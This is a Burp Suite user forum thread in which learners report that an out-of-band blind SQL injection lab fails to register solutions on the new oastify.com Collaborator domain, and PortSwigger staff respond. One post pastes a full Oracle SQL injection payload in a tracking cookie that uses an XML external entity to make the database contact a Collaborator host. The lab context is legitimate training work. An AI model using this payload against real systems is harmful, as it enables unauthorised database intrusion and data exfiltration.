Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Blind SQLi OOB interaction do not work with collaborator on oastify.com

Artur | Last updated: May 01, 2022 11:00AM UTC

Hi, when using collaborator for "Lab: Blind SQL injection with out-of-band interaction" it works in Burp, but it is not marked as completed, perhaps becuase "checks" are checking different (older) burp collaborator domain.

Ben, PortSwigger Agent | Last updated: May 03, 2022 08:17AM UTC

Hi Artur, We are in the process of updating this and some of the other labs so that they can be solved using the new Burp Collaborator domain. We will update this forum post when this work has been carried out.

Yan | Last updated: May 05, 2022 03:28PM UTC

Thanks please.

Antonio | Last updated: Jun 26, 2022 02:59PM UTC

Hi, I have been experiencing the same problem with many (or all, for that matter) out of band challenges, not receiving the expected answer since the oastify domain is used for collaborator. I was going to create a new post, but I think this one is my same problem. I guess we need to wait so that they become operative once again. Thanks, keep up the good work!

Ben, PortSwigger Agent | Last updated: Jun 27, 2022 06:48AM UTC

Hi both, Yan - the 'Blind SQL injection with out-of-band interaction' lab should now be solvable with the oastify.com domain. Antonio - which labs are you having issues with?

Yan | Last updated: Sep 01, 2022 02:23PM UTC

Hi Ben are you sure as I tested it again and I get a 504 gateway time out. Cookie: TrackingId=z3XAmvGIOJr6jQFe'+||+(SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"w2zb7jci8muaxbmw0ifssw5gg7mzao.oastify.com">+%25remote%3b]>'),'/l')+FROM+dual)--; Response: HTTP/1.1 504 Gateway Timeout Content-Type: text/html; charset=utf-8 Connection: close Content-Length: 197 <html><head><title>Server Error: Gateway Timeout</title></head><body><h1>Server Error: Gateway Timeout (0) connecting to 0aa60071036ce426c0ec680700500020.web-security-academy.net</h1></body></html>

Ben, PortSwigger Agent | Last updated: Sep 02, 2022 06:48AM UTC

Hi Yan, Yes, the lab appears to be working as expected: https://snipboard.io/aAYjSi.jpg Is your lab instance still active when you attempt this (can you browse to the lab in a normal browser)? Is your payload correct?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.